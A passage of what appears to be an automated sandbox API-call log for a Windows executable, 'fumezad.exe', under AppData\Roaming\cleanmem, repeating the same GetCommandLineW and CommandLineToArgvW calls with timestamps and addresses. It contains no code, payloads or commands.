pNumArgs=0x42952b) returned 0x2c2ff8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3078*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c30f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3178*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c31f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3278*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c32f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3378*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c33f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3478*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c34f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3578*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c35f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3678*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c36f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3778*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c37f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3878*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c38f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3978*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c39f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3a78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3af8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3b78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3bf8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.513] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.513] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3c78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3cf8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3d78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3df8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3e78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3ef8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c3f78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c4ab8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c4b38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c4bb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c4c38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c4cb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c4d38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c4db8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c4e38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c4eb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c4f38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c4fb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5038*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c50b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5138*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.514] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c51b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.514] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5238*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c52b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5338*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c53b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5438*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c54b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5538*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c55b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5638*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c56b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5738*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c57b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5838*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c58b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5938*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c59b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5a38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5ab8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5b38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5bb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5c38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5cb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.515] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.515] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5d38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: 